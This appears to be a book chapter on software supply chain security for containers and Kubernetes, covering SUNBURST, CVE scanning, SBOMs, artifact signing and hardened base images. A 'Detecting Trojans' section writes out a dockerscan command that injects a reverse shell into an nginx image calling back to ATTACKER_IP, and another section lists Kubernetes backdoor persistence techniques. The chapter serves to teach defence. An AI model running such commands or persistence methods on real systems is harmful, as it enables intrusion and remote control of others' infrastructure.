Chapter 4. Applications and Supply Chain

The SUNBURST supply-chain compromise was a hostile intrusion of US Government and Fortune-500 networks via malware hidden in a legitimately signed, compromised server monitoring agent. The Cozy Bear hacking group used techniques described in this chapter to compromise many billion-dollar companies simultaneously. High value targets were prioritized by the attackers, so smaller organizations may have escaped the potentially devastating consequences of the breach.

Organizations targeted by the attackers suffered losses of data and may have been used as a springboard for further attacks against their own customers. This is the essential risk of a “trusted” supply chain: anybody who consumes something you produce becomes a potential target when you are compromised. The established trust relationship is exploited, and so malicious software is inadvertently trusted.

Often vulnerabilities for which an exploit exists don’t have a corresponding software patch or workaround. Palo Alto research determined this is the case for 80% of new, public exploits. With this level of risk exposure for all running software, denying malicious actors access to your internal networks is the primary line of defense.

The SUNBURST attack infected SolarWinds build pipelines and altered source code immediately before it was built, then hid the evidence of tampering and ensured the binary was signed by the CI/CD system so consumers would trust it.

These techniques were previously unseen on the Mitre ATT&CK Framework, and the attacks compromised networks plundered for military, government, and company secrets—all enabled by the initial supply chain attack. Preventing the ignoble, crafty Captain Hashjack and their pals from covertly entering the organization’s network via any dependencies (libraries, tooling or otherwise) is the job of supply chain security: protecting our sources.

captain

In this chapter we dive into supply chain attacks by looking at some historical issues and how they were exploited, then see how containers can either usefully compartmentalize or dangerously exacerbate supply chain risks. In “Defending Against SUNBURST”, we’ll ask: could we have secured a cloud native system from SUNBURST?

For career criminals like Captain Hashjack, the supply chain provides a fresh vector to assault BCTL’s systems: attack by proxy to gain trusted access to your systems. This means attacking container software supply chains to gain remote control of vulnerable workloads and servers, and daisy-chain exploits and backdoors throughout an organization.

Defaults

Unless targeted and mitigated, supply chain attacks are relatively simple: they impact trusted parts of our system that we would not normally directly observe, like the CI/CD patterns of our suppliers.

This is a complex problem, as we will discuss in this chapter. As adversarial techniques evolve and cloud native systems adapt, you’ll see how the supply chain risks shift during development, testing, distribution, and runtime.

Threat Model

Most applications do not come hardened by default, and you need to spend time securing them. OWASP Application Security Verification Standard provides application security (AppSec) guidance that we will not explore any further, except to say: you don’t want to make an attacker’s life easy by running outdated or error-ridden software. Rigorous logic and security tests are essential for any and all software you run.

That extends from your developers’ coding style and web application security standards, to the supply chain for everything inside the container itself. Engineering effort is required to make them secure and ensure they are secure when updated.

Dependencies in the SDLC are especially vulnerable to attack, and give opportunities to Captain Hashjack to run some malicious code (the “payload”):

  • At installation (package manager hooks, which may be running as root)

  • During development and test (IDEs, builds, and executing tests)

  • At runtime (local, dev, staging, and production Kubernetes pods)

When a payload is executing, it may write further code to the filesystem or pull malware from the internet. It may search for data on a developer’s laptop, a CI server, or production. Any looted credentials form the next phase of the attack.

And applications are not the only software at risk: with infrastructure, policy, and security defined as code, any scripted or automated point of the system that an attacker can infiltrate must be considered, and so is in scope for your threat model.

The Supply Chain

Software supply chains (Figure 4-1) consider the movement of your files: source code, applications, data. They may be plain text, encrypted, on a floppy disk, or in the cloud.

Supply chains exist for anything that is built from other things—perhaps something that humans ingest (food, medicine), use (a CPU, cars), or interact with (an operating system, open source software). Any exchange of goods can be modeled as a supply chain, and some supply chains are huge and complex.

haku 0401
Figure 4-1. A web of supply chains; adapted from https://oreil.ly/r9ndi

Each dependency you use is potentially a malicious implant primed to trigger, awaiting a spark of execution when it’s run in your systems to deploy its payload. Container supply chains are long and may include:

  • The base image(s)

  • Installed operating system packages

  • Application code and dependencies

  • Public Git repositories

  • Open source artifacts

  • Arbitrary files

  • Any other data that may be added

If malicious code is added to your supply chain at any step, it may be loaded into executable memory in a running container in your Kubernetes cluster. This is Captain Hashjack’s goal with malicious payloads: sneak bad code into your trusted software and use it to launch an attack from inside the perimeter of your organization, where you may not have defended your systems as well on the assumption that the “perimeter” will keep attackers out.

Each link of a supply chain has a producer and a consumer. In Table 4-1, the CPU chip producer is the manufacturer, and the next consumer is the distributor. In practice, there may be multiple producers and consumers at each stage of the supply chain.

Table 4-1. Varied example supply chains
Farm food CPU chip An open source software package Your organization’s servers

original producer

Farmer (seeds, feed, harvester)

Manufacturer (raw materials, fab, firmware)

Open source package developer (ingenuity, code)

Open source software, original source code built in internal CI/CD

(links to)

Distributor (selling to shops or other distributors)

Distributor (selling to shops or other distributors)

Repository maintainer (npm, PyPi, etc.)

Signed code artifacts pushed over the network to production-facing registry

(links to)

Local food shop

Vendor or local computer shop

Developer

Artifacts at rest in registry ready for deployment

links to final consumer

End user

End user

End user

Latest artifacts deployed to production systems

Any stage in the supply chain that is not under your direct control is liable to be attacked (Figure 4-2). A compromise of any “upstream” stage—for example, one that you consume—may impact you as a downstream consumer.

For example, an open source software project (Figure 4-3) may have three contributors (or “trusted producers”) with permission to merge external code contributions into the codebase. If one of those contributors’ passwords is stolen, an attacker can add their own malicious code to the project. Then, when your developers pull that dependency into their codebase, they are running the attacker’s hostile code on your internal systems.

Similarity between supply chains
Figure 4-2. Similarity between supply chains
Open source supply chain attack
Figure 4-3. Open source supply chain attack

But the compromise doesn’t have to be malicious. As with the npm event-stream vulnerability, sometimes it’s something as innocent as someone looking to pass on maintainership to an existing and credible maintainer, who then goes rogue and inserts their own payload.

Note

In this case the vulnerable event-stream package was downloaded 12 million times, and was depended upon by more than 1,600 other packages. The payload searched for “hot cryptocurrency wallets” to steal from developers’ machines. If this had stolen SSH and GPG keys instead and used them to propagate the attack further, the compromise could have been much wider.

A successful supply chain attack is often difficult to detect, as a consumer trusts every upstream producer. If a single producer is compromised, the attacker may target individual downstream consumers or pick only the highest-value targets.

Software

For our purposes, the supply chains we consume are for software and hardware. In a cloud environment, a datacenter’s physical and network security is managed by the provider, but it is your responsibility to secure your use of the system. This means we have high confidence that the hardware we are using is safe. Our usage of it—the software we install and its behavior—is where our supply chain risk starts.

Software is built from many other pieces of software. Unlike CPU manufacturing, where inert components are assembled into a structure, software is more like a symbiotic population of cooperating organisms. Each component may be autonomous and choosing to cooperate (CLI tools, servers, OS) or useless unless used in a certain way (glibc, linked libraries, most application dependencies). Any software can be autonomous or cooperative, and it is impossible to conclusively prove which it is at any moment in time. This means test code (unit tests, acceptance tests) may still contain malicious code, which would start to explore the Continuous Integration (CI) build environment or the developer’s machine it is executed on.

This poses a conundrum: if malicious code can be hidden in any part of a system, how can we conclusively say that the entire system is secure?

As Liz Rice points out in Container Security (O’Reilly):

It’s very likely that a deployment of any non-trivial software will include some vulnerabilities, and there is a risk that systems will be attacked through them. To manage this risk, you need to be able to identify which vulnerabilities are present and assess their severity, prioritize them, and have processes in place to fix or mitigate these issues.

Software supply chain management is difficult. It requires you to accept some level of risk and make sure that reasonable measures are in place to detect dangerous software before it is executed inside your systems. This risk is balanced with diminishing rewards—builds get more expensive and more difficult to maintain with each control, and there are much higher expenses for each step.

Warning

Full confidence in your supply chain is almost impossible without the full spectrum of controls detailed in the CNCF Security Technical Advisory Group paper on software supply chain security (addressed later in this chapter).

As ever, you assume that no control is entirely effective and run intrusion detection on the build machines as the last line of defense against targeted or widespread zero-day vulnerabilities that may have included SUNBURST, Shellshock, or DirtyCOW, (see “Architecting Containerized Apps for Resilience”).

Now let’s look at how to secure a software supply chain, starting with minimum viable cloud native security: scanning for CVEs.

Scanning for CVEs

CVEs are published for known vulnerabilities, and it is critical that you do not give Captain Hashjack’s gruesome crew easy access to your systems by ignoring or failing to patch them. Open source software lists its dependencies in its build instructions (pom.xml, package.json, go.mod, requirements.txt, Gemfile, etc.), which gives us visibility of its composition. This means you should scan those dependencies for CVEs using tools like trivy. This is the lowest-hanging fruit in the defense of the supply chain and should be considered a part of the minimum viable container security processes.

trivy can scan code at rest in various places:

  • In a container image

  • In a filesystem

  • In a Git repository

It reports on known vulnerabilities. Scanning for CVEs is minimum viable security for shipping code to production.

This command scans the local directory and finds the gomod and npm dependency files, reporting on their contents (output was edited to fit):

$ trivy fs . 1
2021-02-22T10:11:32.657+0100    INFO    Detected OS: unknown
2021-02-22T10:11:32.657+0100    INFO    Number of PL dependency files: 2
2021-02-22T10:11:32.657+0100    INFO    Detecting gomod vulnerabilities...
2021-02-22T10:11:32.657+0100    INFO    Detecting npm vulnerabilities...

infra/build/go.sum
==================================
Total: 2 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 2, CRITICAL: 0) 2

+-----------------------------+------------------+----------+-------------...
|           LIBRARY           | VULNERABILITY ID | SEVERITY |         INST...
+-----------------------------+------------------+----------+-------------...
| github.com/dgrijalva/jwt-go | CVE-2020-26160   | HIGH     | 3.2.0+incomp...
|                             |                  |          |             ...
|                             |                  |          |             ...
+-----------------------------+------------------+          +-------------...
| golang.org/x/crypto         | CVE-2020-29652   |          | 0.0.0-202006...
|                             |                  |          |             ...
|                             |                  |          |             ...
|                             |                  |          |             ...
+-----------------------------+------------------+----------+-------------...

infra/api/code/package-lock.json
==================================================
Total: 0 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 0, CRITICAL: 0) 3
1

Run trivy against the filesystem (fs) in the current working directory (.).

2

Scanning has found two high-severity vulnerabilities in infra/build/go.sum.

3

The infra/api/code/package-lock.json has no vulnerabilities detected.

So we can scan code in our supply chain to see if it’s got vulnerable dependencies. But what about the code itself?

Ingesting Open Source Software

Securely ingesting code is hard: how can we prove that a container image was built from the same source we can see on GitHub? Or that a compiled application is the same open source code we’ve read, without rebuilding it from source?

While this is hard with open source, closed source presents even greater challenges.

How do we establish and verify trust with our suppliers?

Much to the Captain’s dismay, this problem has been studied since 1983, when Ken Thompson introduced “Reflections on Trusting Trust”:

To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software.

The question of trust underpins many human interactions, and is the foundation of the original internet. Thompson continues:

The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code… As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect.

These philosophical questions of security affect your organization’s supply chain, as well as your customers. The core problem remains unsolved and difficult to correct entirely.

While BCTL’s traditional relationship with software was defined previously as a consumer, when you started public open source on GitHub, you became a producer too. This distinction exists in most enterprise organizations today, as most have not adapted to their new producer responsibilities.

Which Producers Do We Trust?

To secure a supply chain we must have trust in our producers. These are parties outside of your organization and they may include:

  • Security providers such as the root Certificate Authorities to authenticate other servers on a network, and DNSSEC to return the right address for our transmission

  • Cryptographic algorithms and implementations like GPG, RSA, and Diffie-Hellman to secure our data in transit and at rest

  • Hardware enablers like OS, CPU/firmware, and driver vendors to provide us low-level hardware interaction

  • Application developers and package maintainers to prevent malicious code installation via their distributed packages

  • Open source and community-run teams, organizations, and standards bodies, to grow our technologies and communities in the common interest

  • Vendors, distributors, and sales agents to not install backdoors or malware

  • Everybody—not to have exploitable bugs

You may be wondering if it’s ever possible to secure this entirely, and the answer is no. Nothing is ever entirely secure, but everything can be hardened so that it’s less appealing to all except the most skilled of threat actors. It’s all about balancing layers of security controls that might include:

  • Physical second factors (2FA)

    • GPG signing (e.g., Yubikeys)

    • WebAuthn, FIDO2 Project, and physical security tokens (e.g., RSA)

  • Human redundancy

    • Authors cannot merge their own PRs

    • Adding a second person to sign-off critical processes

  • Duplication by running the same process twice in different environments and comparing results

CNCF Security Technical Advisory Group

The CNCF Security Technical Advisory Group (tag-security) published a definitive software supply chain security paper. For an in-depth and immersive view of the field, it is strongly recommended reading:

It evaluates many of the available tools and defines four key principles for supply chain security and steps for each, including:

  1. Trust: Every step in a supply chain should be “trustworthy” due to a combination of cryptographic attestation and verification.

  2. Automation: Automation is critical to supply chain security and can significantly reduce the possibility of human error and configuration drift.

  3. Clarity: The build environments used in a supply chain should be clearly defined, with limited scope.

  4. Mutual Authentication: All entities operating in the supply chain environment must be required to mutually authenticate using hardened authentication mechanisms with regular key rotation.

Software Supply Chain Best Practices, tag-security

It then covers the main parts of supply chain security:

  1. Source code (what your developers write)

  2. Materials (dependencies of the app and its environment)

  3. Build pipelines (to test and build your app)

  4. Artifacts (your app plus test evidence and signatures)

  5. Deployments (how your consumers access your app)

If your supply chain is compromised at any one of these points, your consumers may be compromised too.

Architecting Containerized Apps for Resilience

You should adopt an adversarial mindset when architecting and building systems so security considerations are baked in. Part of that mindset includes learning about historical vulnerabilities in order to defend yourself against similar attacks.

The granular security policy of a container is an opportunity to reconsider applications as “compromised-by-default,” and configure them so they’re better protected against zero-day or unpatched vulnerabilities.

Note

One such historical vulnerability was DirtyCOW: a race condition in the Linux kernel’s privileged memory mapping code that allowed unprivileged local users to escalate to root.

The bug allowed an attacker to gain a root shell on the host, and was exploitable from inside a container that didn’t block ptrace. One of the authors live demoed preventing a DirtyCOW container breakout with an AppArmor profile that blocked the ptrace system call. There’s an example Vagrantfile to reproduce the bug in Scott Coulton’s repo.

Detecting Trojans

Tools like dockerscan can trojanize a container:

trojanize: inject a reverse shell into a docker image

dockerscan

Note

We go into more detail on attacking software and libraries in “Captain Hashjack Attacks a Supply Chain”.

To trojanize a webserver image is simple:

$ docker save nginx:latest -o webserver.tar 1
$ dockerscan image modify trojanize webserver.tar \ 2
  --listen "${ATTACKER_IP}" --port "${ATTACKER_PORT}" 3
  --output trojanized-webserver 4
1

Export a valid webserver tarball from a container image.

2

Trojanize the image tarball.

3

Specify the attacker’s shellcatcher IP and port.

4

Write to an output tarball called trojanized-webserver.

It’s this sort of attack that you should scan your container images to detect and prevent. As dockerscan uses an LD_PRELOAD attack that most container IDS and scanning should detect.

Dynamic analysis of software involves running it in a malware lab environment where it is unable to communicate with the internet and is observed for signs of C2 (“command and control”), automated attacks, or unexpected behavior.

Note

Malware such as WannaCry (a cryptolocking worm) includes a disabling “killswitch” DNS record (sometimes secretly used by malware authors to remotely terminate attacks). In some cases, this is used to delay the deployment of the malware until a convenient time for the attacker.

Together an artifact and its runtime behavior should form a picture of the trustworthiness of a single package, however there are workarounds. Logic bombs (behavior only executed on certain conditions) make this difficult to detect unless the logic is known. For example, SUNBURST closely emulated the valid HTTP calls of the software it infected. Even tracing a compromised application with tools such as sysdig does not clearly surface this type of attack.

Captain Hashjack Attacks a Supply Chain

captain

You know BCTL hasn’t put enough effort into supply chain security. Open source ingestion isn’t regulated, and developers ignore the results of CVE scanning in the pipeline.

Dread Pirate Hashjack dusts off their keyboard and starts the attack. The goal is to add malicious code to a container image, an open source package, or an operating system application that your team will run in production.

In this case, Captain Hashjack is looking to attack the rest of your systems from a foothold in an initial pod attack. When the malicious code runs inside your pods it will connect back to a server that the Captain controls. That connection will relay attack commands to run inside that pod in your cluster so the pirates can have a look around, as shown in Figure 4-4.

From this position of remote control, Captain Hashjack might:

  • Enumerate other infrastructure around the cluster like datastores and internally facing software

  • Try to escalate privilege and take over your nodes or cluster

  • Mine cryptocurrency

  • Add the pods or nodes to a botnet, use them as servers, or “watering holes” to spread malware

  • Any other unintended misuse of your noncompromised systems.

Establishing remote access with a supply chain compromise
Figure 4-4. Establishing remote access with a supply chain compromise

The Open Source Security Foundation (OpenSSF)’s SLSA Framework (“Supply-chain Levels for Software Artifacts,” or “Salsa”) works on the principle that “It can take years to achieve the ideal security state, and intermediate milestones are important.” It defines a graded approach to adopting supply chain security for your builds (see Table 4-2).

Table 4-2. OpenSSF SLSA levels
Level Description Requirements

0

No guarantees

SLSA 0 represents the lack of any SLSA level.

1

Provenance checks to help evaluate risks and security

The build process must be fully scripted/automated and generate provenance.

2

Further checks against the origin of the software

Requires using version control and a hosted build service that generates authenticated provenance. This results in tamper resistance of the build service.

3

Extra resistance to specific classes of threats

The source and build platforms meet specific standards to guarantee the auditability of the source and the integrity of the provenance respectively. Advanced protection including security controls on host, non-falsifiable provenance, and prevention of cross-build contamination.

4

Highest levels of confidence and trust

Strict auditability and reliability checks. Requires two-person review of all changes and a hermetic, reproducible build process.

Let’s move on to the aftermath.

Post-Compromise Persistence

Before attackers do something that may be detected by the defender, they look to establish persistence, or a backdoor, so they can, for example, enter the system if they get detected or unceremoniously ejected, as their method of intrusion is patched.

Note

When containers restart, filesystem changes are lost, so persistence is not possible just by writing to the container filesystem. Dropping a “back door” or other persistence mechanism in Kubernetes requires the attacker to use other parts of Kubernetes or the kubelet on the host, as anything they write inside the container is lost when it restarts.

Depending on how you were compromised, Captain Hashjack now has various options available. None are possible in a well-configured container without excessive RBAC privilege, although this doesn’t stop the attacker exlpoiting the same path again and looking to pivot to another part of your system.

Possible persistence in Kubernetes can be gained by:

  • Starting a static privileged pod through the kubelet’s static manifests

  • Deploying a privileged container directly using the container runtime

  • Deploying an admission controller or CronJob with a backdoor

  • Deploying a shadow API server with custom authentication

  • Adding a mutating webhook that injects a backdoor container to some new pods

  • Adding worker or control plane nodes to a botnet or C2 network

  • Editing container lifecycle postStart and preStop hooks to add backdoors

  • Editing liveness probes to exec a backdoor in the target container

  • Any other mechanism that runs code under the attacker’s control

Risks to Your Systems

Once they have established persistence, attacks may become more bold and dangerous:

  • Exfiltrating data, credentials, and cryptocurrency wallets

  • Pivoting further into the system via other pods, the control plane, worker nodes, or cloud account

  • Cryptojacking compute resources (e.g., mining Monero in Docker containers)

  • Escalating privilege in the same pod

  • Cryptolocking data

  • Secondary supply chain attack on target’s published artifacts/software

Let’s move on to container images.

Container Image Build Supply Chains

Your developers have written code that needs to be built and run in production. CI/CD automation enables the building and deployment of artifacts, and is a traditionally appealing target due to less security rigor than the production systems it deploys to.

To address this insecurity, the Software Factory pattern is gaining adoption as a model for building the pipelines to build software.

Software Factories

A Software Factory is a form of CI/CD that focuses on self-replication. It is a build system that can deploy copies of itself, or other parts of the system, as new CI/CD pipelines. This focus on replication ensures build systems are repeatable, easy to deploy, and easy to replace. They also assist iteration and development of the build infrastructure itself, which makes securing these types of systems much easier.

Use of this pattern requires slick DevOps skills, continuous integration, and build automation practices, and is ideal for containers due to their compartmentalised nature.

Tip

The DoD Software Factory pattern defines the Department of Defense’s best practice ideals for building secure, large-scale cloud or on-prem cloud native infrastructure.

Container images built from, and used to build, the DoD Software Factory are publicly available at IronBank GitLab.

Cryptographic signing of build steps and artifacts can increase trust in the system, and can be revalidated with an admission controller such as portieris for Notary and Kritis for Grafeas.

Tekton is a Kubernetes-based build system that runs build stages in containers. It runs Kubernetes Custom Resources that define build steps in pods, and Tekton Chains can use in-toto to sign the pod’s workspace files. Jenkins X is built on top of it and extends its feature set.

Blessed Image Factory

Some software factory pipelines are used to build and scan your base images, in the same way virtual machine images are built: on a cadence, and in response to releases of the underlying image. An image build is untrusted if any of the inputs to the build are not trusted. An adversary can attack a container build with:

  • Malicious commands in a RUN directive that can attack the host

  • Host’s non-loopback network ports/services

  • Enumeration of other network entities (cloud provider, build infrastructure, network routes to production)

  • Malicious FROM image that has access to build Secrets

  • Malicious image that has ONBUILD directive

  • Docker-in-docker and mounted container runtime sockets that can lead to host breakout

  • Zero-days in container runtime or kernel

  • Network attack surface (host, ports exposed by other builds)

To defend from malicious builds, you should begin with static analysis using Hadolint and conftest to enforce your policy. For example:

$ docker run --rm -i hadolint/hadolint < Dockerfile
/dev/stdin:3 DL3008 Pin versions in apt get install.
/dev/stdin:5 DL3020 Use COPY instead of ADD for files and folders

Conftest wraps OPA and runs Rego language policies (see “Open Policy Agent”):

$ conftest test --policy ./test/policy --all-namespaces Dockerfile
2 tests, 2 passed, 0 warnings, 0 failures, 0 exceptions

If the Dockerfile conforms to policy, scan the container build workspace with tools like trivy. You can also build and then scan, although this is slightly riskier if an attack spawns a reverse shell into the build environment.

If the container’s scan is safe, you can perform a build.

Tip

Adding a hardening stage to the Dockerfile helps to remove unnecessary files and binaries that an attacker may try to exploit, and is detailed in DoD’s Container Hardening Guide.

Protecting the build’s network is important, otherwise malicious code in a container build can pull further dependencies and malicious code from the internet. Security controls of varying difficulty include:

  • Preventing network egress

  • Isolating from the host’s kernel with a VM

  • Running the build process as a nonroot user or in a user namespace

  • Executing RUN commands as a nonroot user in container filesystem

  • Share nothing nonessential with the build

Base Images

When an application is being packaged for deployment it must be built into a container image. Depending on your choice of programming language and application dependencies, your container will use one of the base images from Table 4-3.

Table 4-3. Types of base images
Type of base image How it’s built Contents of image filesystem Example container image

Scratch

Add one (or more) static binary to an empty container root filesystem.

Nothing at all except /my-binary (it’s the only thing in / directory), and any added dependencies (often CA bundles, locale information, static files for the application).

Static Golang or Rust binary examples

Distroless

Add one (or more) static binary to a container that has locale and CA information only (no Bash, Busybox, etc.).

Nothing except my-app, /etc/locale, TLS pubkeys, (plus any dependencies, as per scratch), etc.

Static Golang or Rust binary examples

Hardened

Add nonstatic binary or dynamic application to a minimal container, then remove all nonessential files and harden filesystem.

Reduced Linux userspace: glibc, /code/my-app.py, /code/deps, /bin/python, Python libs, static files for the application.

Web servers, nonstatic or complex applications, IronBank examples

Vanilla

No security precautions, possibly dangerous.

Standard Linux userspace. Root user. Possibly anything and everything required to install, build, compile, or debug applications. This offers many opportunities for attack.

NGINX, raesene/alpine-nettools, nicolaka/netshoot

Minimal containers minimize a container’s attack surface to a hostile process or RCE, reducing an adversary to very advanced tricks like return-oriented programming that are beyond most attackers’ capabilities. Organized criminals like Dread Pirate Hashjack may be able to use these programming techniques, but exploiting vulnerabilities like these are valuable and perhaps more likely to be sold to an exploit broker than used in the field, potentially reducing their value if discovered.

Because statically compiled binaries ship their own system call library, they do not need glibc or another userspace kernel interface, and can exist with only themselves on the filesystem (see Figure 4-5).

app-scratch-vs-glibc
Figure 4-5. How scratch containers and glibc talk to the kernel

Let’s step back a bit now: we need to take stock of our supply chain.

The State of Your Container Supply Chains

Applications in containers bundle all their userspace dependencies with them, and this allows us to inspect the composition of an application. The blast radius of a compromised container is less than a bare metal server (the container provides security configuration around the namespaces), but exacerbated by the highly parallelised nature of a Kubernetes workload deployment.

Secure third-party code ingestion requires trust and verification of upstream dependencies.

Kubernetes components (OS, containers, config) are a supply chain risk in themselves. Kubernetes distributions that pull unsigned artifacts from object storage (such as S3 and GCS) have no way of validating that the developers meant them to run those containers. Any containers with “escape-friendly configuration” (disabled security features, a lack of hardening, unmonitored and unsecured, etc.) are viable assets for attack.

The same is true of supporting applications (logging/monitoring, observability, IDS)—anything that is installed as root, that is not hardened, or indeed not architected for resilience to compromise, is potentially subjected to swashbuckling attacks from hostile forces.

Third-Party Code Risk

During the image build your application installs dependencies into the container, and the same dependencies are often installed onto developers’ machines. This requires the secure ingestion of third party and open source code.

You value your data security, so running any code from the internet without first verifying it could be unsafe. Adversaries like Captain Hashjack may have left a backdoor to enable remote access to any system that runs their malicious code. You should consider the risk of such an attack as sufficiently low before you allow the software inside your organization’s corporate network and production systems.

One method to scan ingested code is shown in Figure 4-6. Containers (and other code) that originate outside your organization are pulled from the internet onto a temporary virtual machine. All software signatures and checksums are verified, binaries and source code are scanned for CVEs and malware, and the artifact is packaged and signed for consumption in an internal registry.

Third-party code ingestion (detailed)
Figure 4-6. Third-party code ingestion

In this example a container pulled from a public registry is scanned for CVEs, e.g., tagged for the internal domain, then signed with Notary and pushed to an internal registry, where it can be consumed by Kubernetes build systems and your developers.

When ingesting third-party code you should be cognizant of who has released it and/or signed the package, the dependencies it uses itself, how long it has been published for, and how it scores in your internal static analysis pipelines.

Tip

Aqua’s Dynamic Threat Analysis for Containers runs potentially hostile containers in a sandbox to observe their behavior for signs of malice.

Scanning third-party code before it enters your network protects you from some supply chain compromises, but targeted attacks may be harder to defend against as they may not use known CVEs or malware. In these cases you may want to observe it running as part of your validation.

Software Bills of Materials

Creating a software bill of materials (SBOM) for a container image is easy with tools like syft, which supports APK, DEB, RPM, Ruby Bundles, Python Wheel/Egg/requirements.txt, JavaScript NPM/Yarn, Java JAR/EAR/WAR, Jenkins plugi-ns JPI/HPI, and Go modules.

It can generate output in the CycloneDX XM format. Here it is running on a container with a single static binary:

user@host:~ [0]$ syft packages controlplane/bizcard:latest -o cyclonedx
Loaded image
Parsed image
Cataloged packages      [0 packages]
<?xml version="1.0" encoding="UTF-8"?>
<bom xmlns="http://cyclonedx.org/schema/bom/1.2"
    version="1" serialNumber="urn:uuid:18263bb0-dd82-4527-979b-1d9b15fe4ea7">
  <metadata>
    <timestamp>2021-05-30T19:15:24+01:00</timestamp>
    <tools>
      <tool>
        <vendor>anchore</vendor>   1
        <name>syft</name>          2
        <version>0.16.1</version>  3
      </tool>
    </tools>
    <component type="container">  4
      <name>controlplane/bizcard:latest</name> 5
      <version>sha256:183257b0183b8c6420f559eb5591885843d30b2</version> 6
    </component>
  </metadata>
  <components></components>
</bom>
1

The vendor of the tool used to create the SBOM.

2

The tool that’s created the SBOM.

3

The tool version.

4

The supply chain component being scanned and its type of container.

5

The container’s name.

6

The container’s version, a SHA256 content hash, or digest.

A bill of materials is just a packing list for your software artifacts. Running against the alpine:base image, we see an SBOM with software licenses (output edited to fit):

user@host:~ [0]$ syft packages alpine:latest -o cyclonedx
 ✔ Loaded image
 ✔ Parsed image
 ✔ Cataloged packages      [14 packages]
<?xml version="1.0" encoding="UTF-8"?>
<bom xmlns="http://cyclonedx.org/schema/bom/1.2"
     version="1" serialNumber="urn:uuid:086e1173-cfeb-4f30-8509-3ba8f8ad9b05">
  <metadata>
    <timestamp>2021-05-30T19:17:40+01:00</timestamp>
    <tools>
      <tool>
        <vendor>anchore</vendor>
        <name>syft</name>
        <version>0.16.1</version>
      </tool>
    </tools>
    <component type="container">
      <name>alpine:latest</name>
      <version>sha256:d96af464e487874bd504761be3f30a662bcc93be7f70bf</version>
    </component>
  </metadata>
  <components>
  ...
  <component type="library">
      <name>musl</name>
      <version>1.1.24-r9</version>
      <licenses>
        <license>
          <name>MIT</name>
        </license>
      </licenses>
      <purl>pkg:alpine/musl@1.1.24-r9?arch=x86_64</purl>
    </component>
  </components>
</bom>

These verifiable artifacts can be signed by supply chain security tools like cosign, in-toto, and notary. When consumers demand that suppliers produce verifiable artifacts and bills of materials from their own audited, compliant, and secure software factories, the supply chain will become harder to compromise for the casual attacker.

Warning

An attack on source code prior to building an artifact or generating an SBOM from it is still trusted, even if it is actually malicious, as with SUNBURST. This is why the build infrastructure must be secured.

Human Identity and GPG

Signing Git commits with GNU Privacy Guard (GPG) signatures identifies the owner of they key as having trusted the commit at the time of signature. This is useful to increase trust, but requires public key infrastructure (PKI), which is notoriously difficult to secure entirely.

Signing data is easy—the verification is hard.

Dan Lorenc

The problem with PKI is the risk of breach of the PKI infrastructure. Somebody is always responsible for ensuring the public key infrastructure (the servers that host individuals’ trusted public keys) is not compromised and is reporting correct data. If PKI is compromised, an entire organization may be exploited as attackers add keys they control to trusted users.

Signing Builds and Metadata

In order to trust the output of your build infrastructure, you need to sign it so consumers can verify that it came from you. Signing metadata like SBOMs also allows consumers to detect vulnerabilities where the code is deployed in their systems. The following tools help by signing your artifacts, containers, or metadata.

Notary v1

Notary is the signing system built into Docker, and implements The Update Framework (TUF). It’s used for shipping software updates, but wasn’t enabled in Kubernetes as it requires all images to be signed, or it won’t run them. portieris implements Notary as an admission controller for Kubernetes instead.

Notary v2 supports creating multiple signatures for OCI Artifacts and storing them in OCI image registries.

sigstore

sigstore is a public software signing and transparency service, which can sign containers with cosign and store the signatures in an OCI repository, something missing from Notary v1. As anything can be stored in a container (e.g., binaries, tarballs, scripts, or configuration files), cosign is a general artifact signing tool with OCI as its packaging format.

sigstore provides free certificates and tooling to automate and verify signatures of source code.

sigstore release announcement

Similar to Certificate Transparency, it has an append-only cryptographic ledger of events (called rekor), and each event has signed metadata about a software release as shown in Figure 4-7. Finally, it supports “a free Root-CA for code signing certs, that is, issuing certificates based on an OIDC email address” in fulcio. Together, these tools dramatically improve the capabilities of the supply chain security landscape.

It is designed for open source software, and is under rapid development. There are integrations for TUF and in-toto, hardware-based tokens are supported, and it’s compatible with most OCI registries.

sigstore’s cosign is used to sign the Distroless base image family.

Storing sigstore manifests in the sigstore manifests into the rekor transparency log
Figure 4-7. Storing sigstore manifests in the rekor transparency log

in-toto and TUF

The in-toto toolchain checksums and signs software builds—the steps and output of CI/CD pipelines. This provides transparent metadata about software build processes. This increases the trust a consumer has that an artifact was built from a specific source code revision.

in-toto link metadata (describing transitions between build stages and signing metadata about them) can be stored by tools like rekor and Grafeas, to be validated by consumers at time of use.

The in-toto signature ensures that a trusted party (e.g., the build server) has built and signed these objects. However, there is no guarantee that the third party’s keys have not been compromised—the only solution for this is to run parallel, isolated build environments and cross-check the cryptographic signatures. This is done with reproducible builds (in Debian, Arch Linux, and PyPi) to offer resilience to build tool compromise.

This is only possible if the CI and builds themselves are deterministic (no side effects of the build) and reproducible (the same artifacts are created by the source code). Relying on temporal or stochastic behaviors (time and randomness) will yield unreproducible binaries, as they are affected by timestamps in logfiles, or random seeds that affect compilation.

When using in-toto, an organization increases trust in their pipelines and artifacts, as there are verifiable signatures for everything. However, without an objective threat model or security assessment of the original build infrastructure, this doesn’t protect supply chains with a single build server that may have been compromised.

Producers using in-toto with consumers that verfiy signatures makes an attacker’s life harder. They must fully compromise the signing infrastructure (as with SolarWinds).

GCP Binary Authorization

The GCP Binary Authorization feature allows signing of images and admission control to prevent unsigned, out of date, or vulnerable images from reaching production.

Validating expected signatures at runtime provides enforcement of pipeline controls: is this image free from known vulnerabilities, or has a list of “accepted” vulnerabilities? Did it pass the automated acceptance tests in the pipeline? Did it come from the build pipeline at all?

Grafeas is used to store metadata from image scanning reports, and Kritis is an admission controller that verifies signatures and the absence of CVEs against the images.

Grafeas

Grafeas is a metadata store for pipeline metadata like vulnerability scans and test reports. Information about a container is recorded against its digest, which can be used to report on vulnerabilities of an organization’s images and ensure that build stages have successfully passed. Grafeas can also store in-toto link metadata.

Infrastructure Supply Chain

It’s also worth considering your operating system base image, and the location your Kubernetes control plane containers and packages are installed from.

Some distributions have historically modified and repackaged Kubernetes, and this introduces further supply chain risk of malicious code injection. Decide how you’ll handle this based upon your initial threat model, and architect systems and networks for compromise resilience.

Operator Privileges

